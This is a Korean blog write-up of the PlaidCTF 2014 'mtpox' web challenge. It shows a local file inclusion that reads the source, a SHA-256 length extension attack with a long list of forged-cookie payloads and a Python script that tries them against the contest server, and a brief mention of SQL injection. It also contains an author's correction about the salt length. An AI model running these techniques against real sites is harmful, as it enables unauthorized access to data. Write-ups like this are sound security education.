int $0x80

pCTF 2014 mtpox writeup 본문

해킹공부/캡쳐더플래그

pCTF 2014 mtpox writeup

cd80 cd80 2014.04.13 03:27
크리에이티브 커먼즈 라이선스
Creative Commons License

이 문제는 저희팀 웹해커 rubiya와 같이풀었습니다 ( http://blog.naver.com/withrubiya )

 

들어가면 이런 메인페이지가 나오고

          <li><a href="/index.php?page=index">Index</a></li>
          <li><a href="/index.php?page=about">About</a></li>
          <li><a href="#">PlaidCoins (under maintenance)</a></li>
          <li><a href="#">PlaidCards (under maintenance)</a></li>
          <li><a href="/admin.php">Admin</a></li>

이렇게 페이지를 이동시킵니다

여기서 index.php?page=admin.php 를 넣어주면

 

 

이렇게 소스를 읽어올 수 있습니다

소스를 분석해보면

먼저 첫 접속땐 $_COOKIE['auth']가 isset돼있지 않으므로

가장 먼저 볼 곳은 첫번째 else문입니다

 

  else {
    $auth = false;
    $s = serialize($auth);
    setcookie("auth", $s);
    setcookie("hsh", hash("sha256", $SECRET . strrev($s)));
  } 

$_COOKIE['auth'] 에 "b:0;"

$_COOKIE['hsh'] 에 hash("256", $SECRET . strrev($s)));

를 넣어 초기화시킵니다

 

rubiya형이 딱 보고 length extension attack인것같다고 말했고

분석해보니 length extension으로 공격하면 될것같아 익스플로잇을 작성했습니다

 

좀더 쉽게 풀기위해 hashpump를 사용해 페이로드를 자동생성했습니다

 

 

hash = "967ca6fa9eacfe716cd74db1b1db85800e451ca85d29bd27782832b9faa16ae1"

payloads = """
b%3A1%3B%C8%01%00%00%00%00%80b%3A0%3B
b%3A1%3B%C0%01%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%B8%01%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%B0%01%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%A8%01%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%A0%01%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%98%01%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%90%01%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%88%01%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%80%01%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3Bx%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3Bp%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3Bh%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%60%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3BX%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3BP%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3BH%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%40%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B8%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B0%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%28%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%20%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%18%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%10%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%08%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%00%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%F8%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%F0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%E8%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%E0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%D8%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%D0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%C8%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%C0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%B8%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%B0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%A8%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%A0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%98%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%90%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%88%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3Bx%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3Bp%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3Bh%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%60%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3BX%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3BP%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3BH%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%40%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B8%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%28%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
"""
payloads = payloads.split("\n")

import urllib2
for i in range(0, len(payloads)):
    req = urllib2.Request("http://54.211.6.40/admin.php")
    cur = payloads[i]
    req.add_header("Cookie", "hsh="+hash+";auth="+cur+";")
    data = urllib2.urlopen(req)

    data = data.read()
    print "key length: %d [ %s ]"%(i, data)
    if data.find("Sorry, not authorized") == -1:
        print "Found key length: %d" % i
        print "Found payload : %s" % payloads[i]
        print "hash : %s" % hash
        break 

 

 

 

이렇게 sha256에 사용된 salt는 46자란걸 알았고

payload와 hash를 얻었으니 이제 쿠키에 설정해주면 됩니다

 

설정해주고 어드민페이지로 들어가면

 

이런게 있는데 form 의 action에 존재하지 않는 페이지가 있습니다

그런데 아까 LFI로 구한 소스파일에 보면 이 form을 처리하는 코드가 있습니다

이 부분에 sql injection을 해서 테이블명과 컬럼명을 구했더니

테이블명은 plaidcoin_wallets이고

컬럼명은 id와 coins가 나왔습니다

그냥 id를 select했더니 키값이 나왔습니다

 

 


=======================================================================


writeup에 잘못쓴게 하나 있는데

익스플로잇을 생성할 때 분명 키 길이 1~54 순서대로 했는데 저 익스플로잇에 거꾸로 넣은거같습니다

왜 그런진 모르겠는데 위 풀이중 솔트 길이가 46자라고 쓴건

54 - 46 해서 8자입니다

대회 끝나고 다른 풀이 보니 about페이지에서 솔트 길이가 8이라는 힌트가 있었습니다

신고

'해킹공부 > 캡쳐더플래그' 카테고리의 다른 글

pCTF 2013 pork  (3) 2014.08.18
ebCTF2013 pwn200 Frainbuck Interderper  (3) 2014.06.20
pCTF 2014 mtpox writeup  (2) 2014.04.13
Volga CTF 2014 Exploit 100  (0) 2014.03.29
CodeGate 2014 angry_doraemon writeup  (16) 2014.02.24
CodeGate 2014 4stone writeup  (3) 2014.02.23
2 Comments
댓글쓰기 폼